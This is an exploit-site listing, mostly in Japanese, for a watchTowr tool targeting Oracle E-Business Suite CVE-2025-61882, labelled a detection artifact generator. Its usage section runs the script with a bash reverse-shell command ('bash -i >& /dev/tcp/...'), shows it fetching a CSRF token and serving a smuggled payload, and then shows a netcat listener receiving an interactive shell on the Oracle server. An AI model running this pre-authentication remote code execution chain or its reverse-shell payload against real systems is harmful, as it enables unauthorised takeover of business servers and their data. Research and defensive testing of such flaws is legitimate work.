Sploitus

Exploit for watchTowr-vs-Oracle-E-Business-Suite

kitploit · 2026-08-25

Exploit Code

MARKDOWN70 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WATCHTOWRLABS-WATCHTOWR-VS-ORACLE-E-BUSINESS-SUITE-CVE-2025-61882
# watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

![画像](https://assets.kitploit.com/production/public/readmes/43025/20f90d00289ff1cb1e587f9382a283bea07985d88aea70b42f37cd0ea18dad22.png)

Oracle E-Business Suite CVE-2025-61882 向け検出アーティファクト生成ツール

技術的な詳細は、ブログ記事 を参照してください

# 動作中の検出

root@kitploit:~
    
    
    python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux  --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
                             __         ___  ___________
             __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
             \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
              \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
               \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                      \/          \/     \/
    
            watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py
    
            (*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator
    
              - Sonny, Sina Kheirkhah (@SinSinology),  Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)
    
            CVEs: [CVE-2025-61882]
    
    [*] Listening on 192.168.1.10:80 and serving payload...
    [*] connecting to target to retrieve CSRF token...
    [*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
    [*] Cooking smuggle stub...
    192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -
    
    

リスナー

root@kitploit:~
    
    
    ubuntu@watchTowr:~$ nc -lvvnp 4444
    Listening on 0.0.0.0 4444
    Connection received on 30290
    bash: no job control in this shell
    [oracle@apps EBS_domain]$ id
    id
    uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
    [oracle@apps EBS_domain]$
    

# 説明

このスクリプトは、Oracle E-Business Suite が CVE-2025-61882 に対して脆弱かどうかを検出しようとします。

# 影響を受けるバージョン

Oracle E-Business Suite、バージョン 12.2.3-12.2.14

詳細については、Oracle Security Alert Advisory - CVE-2025-61882 を参照してください

# watchTowr Labs をフォロー

最新のセキュリティ研究については、watchTowr Labs チームをフォローしてください。

  * https://labs.watchtowr.com/

  * https://x.com/watchtowrcyber